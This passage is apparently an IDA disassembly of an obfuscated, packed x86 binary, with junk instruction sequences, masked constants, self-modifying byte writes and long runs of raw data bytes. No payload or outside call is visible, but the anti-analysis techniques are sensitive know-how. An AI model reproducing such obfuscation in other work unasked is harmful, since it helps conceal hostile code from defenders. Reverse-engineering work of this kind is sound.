db 0DFh, 2 dup(0FFh)
; =============== S U B R O U T I N E =======================================
sub_431F5F proc near ; CODE XREF: sub_43098E+3�p
; fzj3qwht:004309D8�j
arg_8 = dword ptr 0Ch
; FUNCTION CHUNK AT 0042F134 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042F167 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00430A3A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00430B0E SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00430FBB SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0043112B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004311F0 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00431971 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00431D14 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00431E9F SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
pop edi
pop ebx
xchg eax, [esp+0]
or edx, edx
jz loc_4311F5
jmp loc_42F167
sub_431F5F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 2
loc_431F76: ; CODE XREF: fzj3qwht:0042F161�j
mov byte ptr [esi], 87h
pop esi
xchg ebx, [esp]
mov ecx, ebx
jmp loc_42FEEC
; ---------------------------------------------------------------------------
dd 0C30000h, 0CC7E8B0Fh, 0EB81FFFFh, 51B688Fh, 0FFEE14E8h
dd 990000FFh, 0FFF0F5E9h, 0A98B0FFFh, 0E9FFFFCAh, 0FFFFDEA7h
dd 0E7810000h, 45ADA9C4h, 0BF91C3F7h, 0A4E9FEEAh, 0FFFFFEh
dd 24048700h, 8B241C87h, 8B5BC3h, 0D556E952h, 108BFFFFh
dd 0FFE08FE8h
db 0FFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430E27
loc_431FD9: ; CODE XREF: sub_430E27-1647�j
jmp loc_431811
; END OF FUNCTION CHUNK FOR sub_430E27
; ---------------------------------------------------------------------------
dw 5300h
dd 0EFCB8668h, 0C3815B89h, 0FDD99F46h, 8110C3C1h, 0BA5540C3h
dd 0B7E38116h, 0E97C4BFBh, 0FFFFF509h
; ---------------------------------------------------------------------------
locret_432000: ; CODE XREF: fzj3qwht:00430BA4�j
retn
; ---------------------------------------------------------------------------
loc_432001: ; CODE XREF: fzj3qwht:0043225D�j
jmp loc_430B8E
; ---------------------------------------------------------------------------
align 4
loc_432008: ; CODE XREF: fzj3qwht:004310DD�j
jmp loc_431A57
; ---------------------------------------------------------------------------
align 2
word_43200E dw 0B568h ; DATA XREF: fzj3qwht:00430B9F�o
db 0E9h, 0C0h, 0E4h
byte_432013 db 87h ; DATA XREF: sub_4309EE-886�o
dd 58562434h, 0FFEA59E9h
db 0FFh
; ---------------------------------------------------------------------------
locret_43201D: ; CODE XREF: fzj3qwht:0042FE5D�j
; fzj3qwht:loc_430AD1�j
retn
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_430917
loc_432020: ; CODE XREF: sub_430917+1CC4�j
jmp near ptr dword_42E794+99h
; END OF FUNCTION CHUNK FOR sub_430917
; ---------------------------------------------------------------------------
align 2
dw 93E9h
dd 0FFFFEAh, 58240487h, 59240C87h, 0CBEB6856h, 2AE98424h
db 0F0h, 2 dup(0FFh)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_147. PRESS KEYPAD "+" TO EXPAND]
db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_133. PRESS KEYPAD "+" TO EXPAND]
align 4
locret_432044: ; CODE XREF: fzj3qwht:loc_430C36�j
retn
; ---------------------------------------------------------------------------
db 2 dup(0), 0E9h
dd 0FFFFE37Ch, 348A0F00h, 99FFFFE4h, 0FFF7CCE9h, 0E80000FFh
dd 8DCh
db 0
; ---------------------------------------------------------------------------
loc_432061: ; CODE XREF: fzj3qwht:00431EE1�j
jmp near ptr dword_43037C+2
; ---------------------------------------------------------------------------
word_432066 dw 8B56h ; DATA XREF: sub_431C52+5�o
dd 243487F0h, 72B00868h, 0E8815813h, 4347FB82h, 67F2C081h
dd 16E93018h, 0FFFFEDh, 0C9F68100h, 0E9DD7086h, 0FFFFD00Dh
; =============== S U B R O U T I N E =======================================
sub_432090 proc near ; CODE XREF: sub_42F4AE:loc_430A70�p
; FUNCTION CHUNK AT 0042FCC1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042FDEC SIZE 0000000D BYTES
xchg eax, [esp+0]
pop eax
mov byte ptr [ebx], 87h
pop ebx
push eax
mov eax, ebp
jmp loc_42FCC1
sub_432090 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dd 0C2890F00h, 87FFFFE5h, 3C872404h, 5FC78B24h, 9731FC68h
dd 0C0815846h, 72B397CDh, 0FFD7A0E9h
db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FA52
loc_4320C3: ; CODE XREF: sub_42FA52:loc_42FE43�j
mov byte ptr [edx], 3
pop edx
push ebx
mov ebx, eax
xchg ebx, [esp-8+arg_4]
mov eax, offset loc_43082E
jmp loc_4303A4
; END OF FUNCTION CHUNK FOR sub_42FA52
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_431452
loc_4320D8: ; CODE XREF: sub_431452:loc_431946�j
add edx, 93485557h
or edx, 0B4460D7Fh
call sub_4316FE
; END OF FUNCTION CHUNK FOR sub_431452
; ---------------------------------------------------------------------------
db 2 dup(0), 0Fh
dd 7B48Ch
db 3 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431410
loc_4320F3: ; CODE XREF: sub_431410-1598�j
jmp loc_431A37
; END OF FUNCTION CHUNK FOR sub_431410
; ---------------------------------------------------------------------------
dd 0C3810000h, 0F823FE93h, 17D50BBEh, 0E9378B49h, 0FFFFE66Ah
dd 0EA8B5500h, 0BA242C87h, 43288Dh, 0FFCAC9E9h
db 0FFh, 0
word_43211E dw 0C681h ; DATA XREF: fzj3qwht:004306E4�o
dd 66802D65h, 6851F503h, 0C14CE647h, 0F7C98159h, 81E54686h
dd 7D0E0FF1h, 0CA7BE9C7h, 0FFFFh, 22E8058Dh, 58E80043h
dd 0FFFFD1h
; ---------------------------------------------------------------------------
loc_43214C: ; CODE XREF: fzj3qwht:00431C80�j
adc eax, edx
jmp near ptr dword_42F604+59h
; ---------------------------------------------------------------------------
align 4
xor ebp, ecx
adc edi, ecx
or eax, 8A499E8Fh
add eax, 25ACC358h
xor eax, 601F6139h
jmp loc_4328E4
; ---------------------------------------------------------------------------
align 10h
add edx, 0CE90F015h
jmp loc_42F984
; ---------------------------------------------------------------------------
align 4
db 0
byte_43217D db 8Bh, 0C7h, 5Fh ; DATA XREF: sub_42F4AE+1AB6�o
dd 0A0C015FFh, 0E2E90042h, 0FFFFD2h, 43157168h, 200E900h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_432196: ; DATA XREF: fzj3qwht:004302E5�o
xchg edx, [esp]
mov ebp, edx
pop edx
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_158. PRESS KEYPAD "+" TO EXPAND]
byte_43219D db 0E8h ; DATA XREF: fzj3qwht:0042E841�w
dw 0E3ABh
db 2 dup(0FFh), 0
; ---------------------------------------------------------------------------
loc_4321A3: ; CODE XREF: fzj3qwht:0042FDAB�j
jmp loc_4322BF
; ---------------------------------------------------------------------------
dd 0FE90000h, 0FFFFDAh, 87D98B53h, 58D241Ch, 431DCEh, 0FFD4B0E8h
dd 0FA68FFh, 62E90043h, 4
; ---------------------------------------------------------------------------
locret_4321CC: ; CODE XREF: fzj3qwht:004322AB�j
retn
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_4321CF: ; CODE XREF: fzj3qwht:0043003E�j
jmp near ptr loc_431604+1
; ---------------------------------------------------------------------------
loc_4321D4: ; CODE XREF: fzj3qwht:0042F927�j
sub edx, 48A3075h
xor edx, 0A3B262F3h
add edx, ebp
add edx, 7038FA8Bh
jmp near ptr dword_42EB78+1Eh
; ---------------------------------------------------------------------------
align 2
rol ebx, 1Eh
add ebx, 158E2C5Bh
add eax, ebx
pop ebx
push 4313BCh
jmp locret_430788
; ---------------------------------------------------------------------------
dd 860F0000h, 0FFFFED79h, 0E895820Fh, 0C881FFFFh, 0E487DFE5h
dd 0CC13E950h, 0FFFFh
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_152. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(0), 0E9h
dd 0FFFFE42Fh, 838C0F00h, 0E8FFFFD2h, 0FFFFD1CDh, 0F644E900h
dd 0C300FFFFh, 0FFD073E9h
db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F4AE
loc_432243: ; CODE XREF: sub_42F4AE+14F�j
jmp loc_42FCB8
; END OF FUNCTION CHUNK FOR sub_42F4AE
; ---------------------------------------------------------------------------
dd 6EE9D823h, 0FFFFC5h
db 0
; ---------------------------------------------------------------------------
loc_432251: ; CODE XREF: fzj3qwht:00430441�j
xchg ecx, [esp]
mov eax, ecx
pop ecx
and eax, 70ED8D24h
jmp loc_432001
; ---------------------------------------------------------------------------
align 4
mov byte ptr [ebx], 9
xchg esi, [esp]
mov ebx, esi
pop esi
mov edi, 4319B1h
jmp loc_42E908
; ---------------------------------------------------------------------------
align 4
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431F38
loc_432279: ; CODE XREF: sub_431F38+A�j
mov byte ptr [eax], 8Dh
pop eax
xor ebx, 1378043Bh
sub ebx, 0A0834513h
rol ebx, 1Ah
and ebx, 0A6F84578h
jmp near ptr dword_42FFF0+1
; END OF FUNCTION CHUNK FOR sub_431F38
; ---------------------------------------------------------------------------
mov byte ptr [esi], 0C6h
pop esi
call sub_42FC3B
loc_4322A0: ; CODE XREF: fzj3qwht:00430A34�j
jmp loc_42F2E4
; ---------------------------------------------------------------------------
align 2
push 42FD23h
jmp locret_4321CC
; ---------------------------------------------------------------------------
dd 0E3810000h, 0BECA5BDEh, 0FFF294E8h
db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
loc_4322BF: ; CODE XREF: fzj3qwht:loc_4321A3�j
add edi, 962EEE86h
add edi, ebp
add edi, 0AE51217Fh
loc_4322CD: ; DATA XREF: fzj3qwht:0042FA62�o
mov [edi], eax
push edi
mov edi, 42EB96h
jmp near ptr dword_42F20C+1Eh
; =============== S U B R O U T I N E =======================================
sub_4322DA proc near ; CODE XREF: sub_431410-15A7�p
xchg eax, [esp+0]
pop eax
mov byte ptr [eax], 0C3h
retn
sub_4322DA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_4322E3: ; CODE XREF: fzj3qwht:0042F2E9�j
jmp locret_42F571
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 0E0h, 0CCh, 0B9h
; ---------------------------------------------------------------------------
retf
; ---------------------------------------------------------------------------
db 87h, 0Ch, 24h
dd 0E959C18Bh, 0FFFFCF59h, 0ED67E381h
; ---------------------------------------------------------------------------
sbb [ecx], ch
loc_4322FE: ; CODE XREF: fzj3qwht:0042FCD8�j
jmp near ptr dword_42F8D8+4
; ---------------------------------------------------------------------------
align 4
db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_143. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431686
loc_432306: ; CODE XREF: sub_431686-9D3�j
jmp loc_43278E
; END OF FUNCTION CHUNK FOR sub_431686
; ---------------------------------------------------------------------------
align 4
db 0
; ---------------------------------------------------------------------------
loc_43230D: ; CODE XREF: fzj3qwht:0042EF32�j
jmp loc_4324F4
; ---------------------------------------------------------------------------
align 4
jmp locret_42FDC8
; ---------------------------------------------------------------------------
align 2
loc_43231A: ; CODE XREF: fzj3qwht:0042E97E�j
jmp loc_42EFB8
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_432322: ; DATA XREF: sub_431452-1102�o
push esi
mov esi, offset loc_432959
jmp loc_432461
; ---------------------------------------------------------------------------
align 2
dw 0C981h
dd 98F8A593h, 0F1CCC181h, 850F772Ah, 0FFFFE309h, 0E9C82300h
dd 0FFFFE529h, 0B026E381h, 3C87F644h, 24148724h, 0E95AFA8Bh
dd 0FFFFCC50h
; ---------------------------------------------------------------------------
loc_43235C: ; CODE XREF: fzj3qwht:00431619�j
sub eax, 0B8DFA5AFh
call near ptr dword_4311B8+5
jmp near ptr dword_42FA74+0Fh
; ---------------------------------------------------------------------------
dd 0E9530000h, 0FFFFF0DEh
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 2
; START OF FUNCTION CHUNK FOR sub_42F4AE
loc_432376: ; CODE XREF: sub_42F4AE-1A9�j
jmp nullsub_150
; END OF FUNCTION CHUNK FOR sub_42F4AE
; ---------------------------------------------------------------------------
align 4
dd 0FCEFBF57h, 5DE90042h, 0FFFFF2h, 0B6C18100h, 0E903B379h
dd 356h, 0C30000h
db 0, 8Bh, 32h
; =============== S U B R O U T I N E =======================================
sub_43239B proc near ; CODE XREF: fzj3qwht:loc_4313CB�p
xchg eax, [esp+0]
pop eax
push 9803901h
pop edx
jmp near ptr word_42F5CE+1
sub_43239B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dw 3C87h
dd 26685F24h, 5A886322h, 4BB1F281h, 0EA81AF9Eh, 4E0E9CE6h
dd 0CFD7C281h, 0D503A1BAh, 0FFD279E9h, 0C3FFh, 0E80000C6h
dd 0FFFFE2C9h, 0F6810000h, 0B850FDB0h, 0FFEA42E9h
db 0FFh, 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_4323E7 proc near ; CODE XREF: fzj3qwht:00431E9A�p
; FUNCTION CHUNK AT 0042EB3D SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00431B02 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00431BC3 SIZE 00000005 BYTES
xchg eax, [esp+0]
xchg ebp, [esp+0]
mov eax, ebp
pop ebp
push ebx
mov ebx, esi
jmp loc_431B02
sub_4323E7 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dd 0CF330000h, 0FFC755E9h, 6C600FFh, 240C878Ah, 0E959F18Bh
dd 21Eh, 0E99C0000h, 0FFFFCDF6h
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_43241A proc near ; CODE XREF: sub_430011+A�p
xchg edx, [esp+0]
pop edx
popf
retn 0D3C0h
sub_43241A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dw 850Fh
dd 0FFFFD25Ch, 0FFD5EAE9h, 0C300FFh
; ---------------------------------------------------------------------------
loc_432430: ; CODE XREF: fzj3qwht:0042FEE5�j
jmp locret_42F53B
; ---------------------------------------------------------------------------
align 2
cdq
jmp sub_430A5C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F4AE
loc_43243C: ; CODE XREF: sub_42F4AE+11CF�j
pushf
call loc_43151C
add al, ch
imul ebx
; END OF FUNCTION CHUNK FOR sub_42F4AE
; ---------------------------------------------------------------------------
dw 0FFFFh
dd 5CE90000h, 0FFFFF0h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430F48
loc_432450: ; CODE XREF: sub_430F48+B�j
sub edi, 0D7C7A51Dh
add edi, 92DD1274h
jmp loc_4327D8
; END OF FUNCTION CHUNK FOR sub_430F48
; ---------------------------------------------------------------------------
loc_432461: ; CODE XREF: fzj3qwht:00432328�j
call near ptr dword_42F364+15h
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_432467: ; CODE XREF: fzj3qwht:0042FB84�j
jmp loc_431228
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430F2A
loc_43246C: ; CODE XREF: sub_430F2A+A�j
push offset loc_42F83E
jmp nullsub_140
; END OF FUNCTION CHUNK FOR sub_430F2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FF6B
loc_432476: ; CODE XREF: sub_42FF6B:loc_42EFB2�j
call loc_43159A
loc_43247B: ; CODE XREF: fzj3qwht:00431124�j
add [edi-1774DBFCh], al
pop eax
retn
; END OF FUNCTION CHUNK FOR sub_42FF6B
; ---------------------------------------------------------------------------
align 8
dd offset sub_432AFD
dd 0FFEA33E9h, 0A4E900FFh, 0FFFFFDh, 116h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4316FE
loc_43249C: ; CODE XREF: sub_4316FE-1D82�j
jmp locret_42F5B0
; END OF FUNCTION CHUNK FOR sub_4316FE
; ---------------------------------------------------------------------------
align 4
dd 0EDAA3A7Ah
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4301B7
loc_4324AA: ; CODE XREF: sub_4301B7+1B�j
jmp loc_43164B
; END OF FUNCTION CHUNK FOR sub_4301B7
; ---------------------------------------------------------------------------
align 10h
jmp loc_42EF28
; ---------------------------------------------------------------------------
db 2 dup(0), 81h
dd 0FA1196CEh, 0C9F7E991h, 5E00FFFFh, 3A66C081h, 0E8812A18h
dd 3B8F4D56h, 5340E081h, 890F4A0Eh, 0FFFFC2F0h, 0D2D0E900h
db 2 dup(0FFh), 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EB56
loc_4324E3: ; CODE XREF: sub_42EB56+10�j
jmp loc_42FAD6
; END OF FUNCTION CHUNK FOR sub_42EB56
; ---------------------------------------------------------------------------
dd 52E90000h, 0C3FFFFEEh, 0FC558B00h
; ---------------------------------------------------------------------------
loc_4324F4: ; CODE XREF: fzj3qwht:loc_43230D�j
push ebx
pushf
push 222A23D9h
pop ebx
jmp loc_43254D
; ---------------------------------------------------------------------------
loc_432501: ; CODE XREF: fzj3qwht:004306C0�j
cmp dword ptr [ebp-10h], 0
jge near ptr dword_42EA44+0B2h
jmp loc_431B61
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_432512: ; CODE XREF: fzj3qwht:0042EF38�j
push 42E88Bh
jmp near ptr dword_42E868+1Ah
; ---------------------------------------------------------------------------
mov byte ptr [eax], 0
push 7E1652F9h
pop eax
xor eax, 7B1BC665h
jmp loc_430A55
; ---------------------------------------------------------------------------
dd 37E9CB85h, 0FFFFDDh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430A5C
loc_432538: ; CODE XREF: sub_430A5C+F�j
add eax, ebp
add eax, 3BB1BC4Fh
jnz short $+2
push ebp
push esp
add eax, 0C94FE9E0h
; END OF FUNCTION CHUNK FOR sub_430A5C
; ---------------------------------------------------------------------------
db 2 dup(0FFh), 0
db 0
; ---------------------------------------------------------------------------
loc_43254D: ; CODE XREF: fzj3qwht:004324FC�j
xor ebx, 0F975535Bh
add ebx, 0B51526ACh
sub ebx, 7A8D6698h
add ebx, 0EA5BD627h
popf
jmp loc_4306B4
; ---------------------------------------------------------------------------
db 0C1h
dd 525717C1h, 1487D38Bh, 0F2E3E924h
db 2 dup(0FFh), 0
; ---------------------------------------------------------------------------
loc_43257B: ; DATA XREF: fzj3qwht:loc_430DC9�o
xor eax, 27F5436Dh
push offset loc_42E8EC
jmp loc_432737
; ---------------------------------------------------------------------------
db 0C1h
dd 870F1FC5h, 0FFFFCA0Bh, 9BE9CA33h, 0FFFFEFh, 69860F00h
dd 81FFFFD5h, 625BF9E2h, 0C84CE98Ch, 8B00FFFFh, 682AF612h
dd 431B54h, 393E9h, 81000000h, 12EB4DCBh, 0E9FA8BAAh, 0FFFFFAC4h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430917
loc_4325CD: ; CODE XREF: sub_430917+A�j
mov byte ptr [edx], 0C3h
xchg ebp, [esp+0]
mov edx, ebp
pop ebp
push offset loc_42E83C
jmp loc_432020
; END OF FUNCTION CHUNK FOR sub_430917
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F4AE
loc_4325E1: ; CODE XREF: sub_42F4AE-1D5�j
push offset loc_4303EC
jmp locret_4315AC
; END OF FUNCTION CHUNK FOR sub_42F4AE
; ---------------------------------------------------------------------------
align 4
db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_151. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_4325EE: ; CODE XREF: fzj3qwht:0043131E�j
jmp near ptr dword_430EEC+1Ah
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431452
loc_4325F3: ; CODE XREF: sub_431452:loc_430338�j
; DATA XREF: sub_42F4AE:loc_430121�o
mov byte ptr [eax], 0Fh
call sub_431F11
loc_4325FB: ; CODE XREF: sub_431F5F-FA0�j
jmp near ptr dword_42E794+87h
; END OF FUNCTION CHUNK FOR sub_431452
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_432601: ; CODE XREF: fzj3qwht:004302CE�j
jmp loc_430A50
; ---------------------------------------------------------------------------
dw 0F7E9h
dd 68FFFFE0h, 42EA45h, 0FFCF70E9h
; ---------------------------------------------------------------------------
inc dword ptr [eax]
; START OF FUNCTION CHUNK FOR sub_431410
loc_432616: ; CODE XREF: sub_431410+14�j
call sub_42EB56
add [edi], cl
loc_43261D: ; CODE XREF: sub_42EB56+F8C�j
mov [eax-197E0001h], gs
sub eax, 0E8948FA1h
das
out dx, al
; END OF FUNCTION CHUNK FOR sub_431410
; ---------------------------------------------------------------------------
db 0FFh
dd 0ACE9C3FFh
db 0DFh, 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_432633: ; CODE XREF: fzj3qwht:00430CE1�j
jmp loc_43195D
; ---------------------------------------------------------------------------
db 2 dup(0)
word_43263A dw 8Bh ; DATA XREF: fzj3qwht:0043100E�o
dword_43263C dd 0E005449Eh, 4324F168h, 0FEA5E900h ; DATA XREF: fzj3qwht:0042EEF6�o
db 2 dup(0FFh), 0
; ---------------------------------------------------------------------------
loc_43264B: ; CODE XREF: fzj3qwht:0042F1C4�j
xchg ecx, [esp]
pop ecx
jz loc_42FEE0
push ebx
mov ebx, edi
xchg ebx, [esp]
jmp loc_430FEF
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_432662: ; CODE XREF: fzj3qwht:00431758�j
push 95754FE9h
pop esi
xor esi, 0C2C0C0Fh
sub esi, 8D519ACBh
jmp loc_4315AD
; ---------------------------------------------------------------------------
loc_432679: ; CODE XREF: fzj3qwht:0042F35E�j
or edx, 0B0661E32h
push edx
mov edx, offset byte_430FAF
jmp loc_431F03
; ---------------------------------------------------------------------------
dw 8700h
dd 0DB70E9C6h
db 2 dup(0FFh), 0
byte_432693 db 52h ; DATA XREF: fzj3qwht:0043018C�o
dd 1487D18Bh, 471B924h, 6BE90043h
db 0E8h, 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_4326A3: ; CODE XREF: fzj3qwht:00431147�j
add edx, 0A90B6B0Dh
push ecx
mov ecx, 432421h
jmp near ptr dword_42F364+2
; ---------------------------------------------------------------------------
dd 1C87DF1Bh, 243C8724h, 0C9E9DF8Bh, 3FFFFFDh, 0FC7EE9CFh
dd 0FFFFh
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 2
; START OF FUNCTION CHUNK FOR sub_42FF32
loc_4326CE: ; CODE XREF: sub_42FF32+9�j
jmp loc_42FE9D
; END OF FUNCTION CHUNK FOR sub_42FF32
; ---------------------------------------------------------------------------
align 4
db 0
; ---------------------------------------------------------------------------
loc_4326D5: ; CODE XREF: fzj3qwht:0042F183�j
jmp loc_430198
; ---------------------------------------------------------------------------
align 4
mov ecx, edi
sub eax, 827E1BD9h
jmp loc_4306F0
; ---------------------------------------------------------------------------
align 2
dw 3487h
dd 0BB535E24h, 432540h, 0FFD6D2E9h, 243487FFh, 8B53EC8Bh
dd 0FA5E68D9h, 4E90042h, 0FFFFE2h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431F11
loc_43270D: ; CODE XREF: sub_431F11:loc_431388�j
; DATA XREF: sub_42F4AE+32BD�o
and eax, [eax+edx*2+56FFFFD7h]
push 351597C7h
xchg edi, [esp-4+arg_0]
mov esi, edi
jmp loc_42E938
; END OF FUNCTION CHUNK FOR sub_431F11
; ---------------------------------------------------------------------------
db 87h
dd 0C65F243Ch, 815A8B02h, 66157BE0h, 0DB880F8Fh
db 0FAh, 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_432737: ; CODE XREF: fzj3qwht:00432586�j
jmp near ptr dword_42E794+15h
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FA52
loc_43273D: ; CODE XREF: sub_42FA52+962�j
jmp loc_431F49
; END OF FUNCTION CHUNK FOR sub_42FA52
; ---------------------------------------------------------------------------
dw 0F00h
; ---------------------------------------------------------------------------
mov ds, word ptr [ecx]
add eax, [eax]
add [ecx-7480251Dh], al
imul ebp, ecx, 0FFFFC176h
loc_432754: ; CODE XREF: fzj3qwht:loc_43180A�j
pop esi
and esi, 53F6BEAEh
cmp esi, 460078A5h
jmp loc_431D41
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F4AE
loc_432766: ; CODE XREF: sub_42F4AE+7A�j
mov edx, eax
xchg edx, [esp-0Ch+arg_8]
mov eax, offset loc_43270D
jmp loc_430121
; END OF FUNCTION CHUNK FOR sub_42F4AE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431686
loc_432775: ; CODE XREF: sub_431686+111A�j
js loc_430F61
mov edi, [eax]
jmp loc_431A8F
; END OF FUNCTION CHUNK FOR sub_431686
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F8A9
loc_432782: ; CODE XREF: sub_42F8A9+5�j
call loc_431A8F
; END OF FUNCTION CHUNK FOR sub_42F8A9
; ---------------------------------------------------------------------------
db 0
db 0
; ---------------------------------------------------------------------------
loc_432789: ; CODE XREF: fzj3qwht:00431441�j
jmp near ptr byte_430E9D+2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431686
loc_43278E: ; CODE XREF: sub_431686:loc_432306�j
call sub_430AEE
add [edi], cl
test [ecx], ah
call near ptr 0F4AC279Bh
test byte ptr [edx+0], 0E9h
jno short loc_432775
; END OF FUNCTION CHUNK FOR sub_431686
; ---------------------------------------------------------------------------
dw 0FFFFh
db 2 dup(0)
word_4327A6 dw 0C081h ; DATA XREF: fzj3qwht:004313E1�o
; ---------------------------------------------------------------------------
retn 0D4Ah
; ---------------------------------------------------------------------------
db 0A9h
dd 0EC68C503h, 0E900431Dh, 0FFFFEB71h, 51C30000h, 0C87CE8Bh
dd 9ABB5324h, 0E9004307h, 0FFFFF87Bh
; ---------------------------------------------------------------------------
loc_4327CC: ; CODE XREF: fzj3qwht:00431B29�j
xchg ebx, [esp]
pop ebx
push edx
call sub_431686
; ---------------------------------------------------------------------------
dw 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430F48
loc_4327D8: ; CODE XREF: sub_430F48+1514�j
jmp loc_4303B9
; END OF FUNCTION CHUNK FOR sub_430F48
; ---------------------------------------------------------------------------
align 2
dw 0C87h
dd 0B8505924h, 431AF8h, 0FFF4B6E9h, 0F0000FFh, 0FFF19E8Eh
dd 0E9EB87FFh, 0FFFFC7D3h, 0E9990000h, 0FFFFE199h
; ---------------------------------------------------------------------------
loc_432804: ; CODE XREF: fzj3qwht:0042F27A�j
xchg edx, [esp]
pop edx
add eax, 0EFB87C22h
mov eax, [eax]
push offset loc_42F481
jmp locret_42F480
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_431167
loc_43281C: ; CODE XREF: sub_431167:loc_430025�j
mov byte ptr [eax], 87h
pop eax
push ebx
push offset loc_4328FE
jmp loc_42FF7C
; END OF FUNCTION CHUNK FOR sub_431167
; ---------------------------------------------------------------------------
align 4
retn
; ---------------------------------------------------------------------------
db 2 dup(0), 87h
; ---------------------------------------------------------------------------
add al, 24h
retn
; ---------------------------------------------------------------------------
loc_432833: ; CODE XREF: fzj3qwht:00431C04�j
jmp loc_4302E1
; ---------------------------------------------------------------------------
dd 1FD26800h, 0F2E90043h, 0FFFFF9h, 0CF035300h, 0FFF2A0E9h
db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
loc_43284F: ; CODE XREF: fzj3qwht:00431006�j
cmp esi, 2D731484h
jmp loc_42F883
; ---------------------------------------------------------------------------
dw 8100h
dd 0E64C5DF8h, 0F470E90Fh, 0FFFFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430BD8
loc_432868: ; CODE XREF: sub_430BD8+16�j
push 42F759h
jmp near ptr dword_42F854+14h
; END OF FUNCTION CHUNK FOR sub_430BD8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431E69
loc_432872: ; CODE XREF: sub_431E69-EEB�j
mov byte ptr [eax], 8Bh
pop eax
add eax, 0D79F39E0h
loc_43287C: ; DATA XREF: sub_431E69:loc_430F79�o
cwde
loc_43287D: ; CODE XREF: sub_42F4AE:loc_430669�j
add cl, ch
scasd
; END OF FUNCTION CHUNK FOR sub_431E69
; ---------------------------------------------------------------------------
dd 87FFFFDFh, 815A2414h, 0B646DBC6h, 9C368B6Dh, 0C5965268h
dd 243487B8h, 50E9CE8Bh, 0FFFFFF6h, 0FFD2D98Eh
db 0FFh
